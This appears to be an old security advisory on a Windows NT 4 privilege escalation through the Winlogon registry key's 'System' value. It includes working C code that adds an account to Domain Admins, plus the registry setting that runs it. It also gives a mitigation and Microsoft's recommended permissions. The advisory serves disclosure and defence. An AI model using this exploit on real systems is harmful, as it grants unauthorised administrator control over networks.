COMMAND

    winlogon registry key

SYSTEMS AFFECTED

    Win NT

PROBLEM

    mnemonix found following.  There is an interesting hole opened  up
    in the  winlogon registry  key on  NT 4  that allows  elevation of
    privileges  to  both  local  and  global Administrator level.  The
    following registry key permissions are set to "Server perator"   -
    Special Access.  Part of  this access  gives them  the "Set Value"
    permission:

        HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

    One of the pre-existing values for this key is

        System:REG_SZ:lsass.exe

    A server operator may  change this value to  what they wish in  an
    effort to  gain Admin  rights.   Anything they  place here will be
    run  with  System  privileges.However,  there  are  a  couple   of
    problems.  Firstly any exectuable ran from here in non-interactive
    so there is no point  in running usrmgr.exe or cmd.exe.   Secondly
    it seems that any executeable  run from here with arguments  fails
    eg "cmd.exe /c copy file.ext newfile.ext".  Thirdly, it seems that
    the SAM is locked Read-Only temporarily after the SAS keystroke is
    entered (Ctrl+Alt+Del).  What is needed then is an executable that
    requires no  arguments, that  pauses long  enough for  the SAM  to
    become  writable  again  and  gives  the attacker local and global
    Admin  rights.   The  following  code  meets  those  requirements.
    Replace "acc_name" with the relevant account name.

    /* GetadmforSops.exe - David Litchfield 11 Jan 1999 */
    /* Compile with eg Visual C++ and link with netapi32.lib */

    #define UNICODE
    #include <windows.h>
    #include <wchar.h>
    #include <lmaccess.h>
    #include <winbase.h>

    int __cdecl wmain (void)
    {
     LPWSTR group = L"Domain Admins";
     LPWSTR acc = L"acc_name";

     NET_API_STATUS nas=0;

     _sleep(180000);
      if( (nas=NetGroupAddUser(NULL, group, acc)) == 0)
      {
       wprintf(L"Success");
       return 0;
      }
       return 0;
    }

    Set the System value to :

        System:REG_SZ:lsass,c:\FULL_PATH_TO\getadmforsops.exe

    and reboot the system.   Three minutes later "acc_name" is  made a
    member of the "Domain Admins" group  wich is also a member of  the
    local Administrators group.

SOLUTION

    If you can trust your "Server Operators" then you don't need to do
    much - if  you'd prefer to  be more safe  however remove the  "Set
    Value" permission to this key.  This was tested of NT Service pack
    3 with hotfixes  - though it  will almost certainly  work on NT  4
    with SP 4  unless the SP  changes the permissions  on the winlogon
    registry key.

    Actually,  this  issue  is  documented  in the whitepaper entitled
    "Security Windows NT Installation", available at this URL:

        http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.asp

    "In the  environments where  members of  server operators  are not
    sufficiently trusted, it is recommended that security on following
    keys be changed as below:

    Registry Key                                    Recommended Permissions

    HKEY_LOCAL_MACHINE\Software\Microsoft
    \Windows NT\CurrentVersion\Winlogon             CREATOR OWNER: Full Control
                                                            Administrators: Full
    Control
                                                            SYSTEM: Full Control
                                                            Everyone: Read